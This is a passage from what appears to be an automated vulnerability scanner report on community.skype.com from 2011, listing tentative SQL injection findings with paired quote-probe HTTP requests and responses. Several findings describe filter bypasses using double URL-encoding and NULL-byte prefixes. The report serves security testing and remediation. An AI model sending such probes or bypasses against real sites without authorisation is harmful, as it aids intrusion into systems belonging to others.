1.13. http://community.skype.com/t5/Windows/Api-access-control-wont-remember/m-p/134242 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Api-access-control-wont-remember/m-p/134242

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Api-access-control-wont-remember/m-p/134242?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 188254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.14. http://community.skype.com/t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Disabling-Skype-Home-autostart/m-p/64492 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:27 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 253237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.15. http://community.skype.com/t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:04 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Error-in-quot-Add-a-contact-quot-dialog/m-p/129510 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:04 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 182769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.16. http://community.skype.com/t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/Windows/Skype-Refuses-to-load-no-error-message-windows-7/td-p/26644 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 246052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...

1.17. http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true

Issue detail

The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 9 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 500 Internal Server Error
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 36079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> An Unexpecte
...[SNIP]...
<div class="exception-page-message IncorrectValueFormatException lia-component-content" class="exception-page-message IncorrectValueFormatException">
...[SNIP]...
<li>
           Sorry, your request failed. A notification has been sent to the development team for investigation.<p>
...[SNIP]...

Request 2

GET /t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/25246/message-uid/25246/highlight/true%2527%2527 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:44:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.18. http://community.skype.com/t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/forumtopicprintpage/board-id/Windows/message-id/2921/print-single-message/true/page/1?1%2527%2527=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:55 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> noptrix.net
...[SNIP]...

1.19. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/message

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id/English/post-type/message HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Posts -
...[SNIP]...

1.20. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/message [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/message

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/forums/recentpostspage/category-id/English/post-type/message?1'=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id/English/post-type/message?1''=1 HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:40 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 117640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Posts -
...[SNIP]...

1.21. http://community.skype.com/t5/forums/recentpostspage/category-id/English/post-type/thread [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/recentpostspage/category-id/English/post-type/thread

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /t5/forums/recentpostspage/category-id'/English/post-type/thread HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:45:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 115960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> All Topics -
...[SNIP]...
ine-alert",
"BASE_AJAX_LOADER_OVERLAY" : "lia-ajax-loader-overlay",
"BASE_AJAX_LOADER_CONTENT_OVERLAY" : "lia-ajax-loader-content-overlay",
"BASE_SPOILER_LINK" : "lia-spoiler-link",
"BASE_FORM_ERROR_TEXT" : "lia-form-error-text",
"BASE_AJAX_LOADER_FEEDBACK" : "lia-ajax-loader-feedback",
"BASE_FEEDBACK_SCROLL_TO" : "lia-feedback-scroll-to",
"BASE_TABS_STANDARD" : "lia-tabs-standard",
"BASE
...[SNIP]...

Request 2

GET /t5/forums/recentpostspage/category-id''/English/post-type/thread HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:45:49 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

1.22. http://community.skype.com/t5/forums/searchpage/tab/message [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/forums/searchpage/tab/message

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:46:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/forums/searchpage/tab/message?advanced=true&filter=acceptedSolutions%2CsolvedThreads&location=Category%3AEnglish&solution=true&solved=true&sort_by=-solutionDate HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:46:13 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 189840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Search - Sky
...[SNIP]...

1.23. http://community.skype.com/t5/help/faqpage/faq-category-id/advanced [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/advanced

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /t5/help/faqpage/faq-category-id%2527/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id%2527%2527/advanced HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 44545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...

1.24. http://community.skype.com/t5/help/faqpage/faq-category-id/ideas [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/ideas

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 503 Service Unavailable
Date: Sun, 04 Sep 2011 21:43:41 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 523
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head><title>Processing Request</title></head>
<body>

<table width="780" height="46" cellpadding="10" cellspacing="0" border="0" align=center>
<tr><td align=center>
<br><br>
<font face="arial"
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/ideas HTTP/1.1
Host: community.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
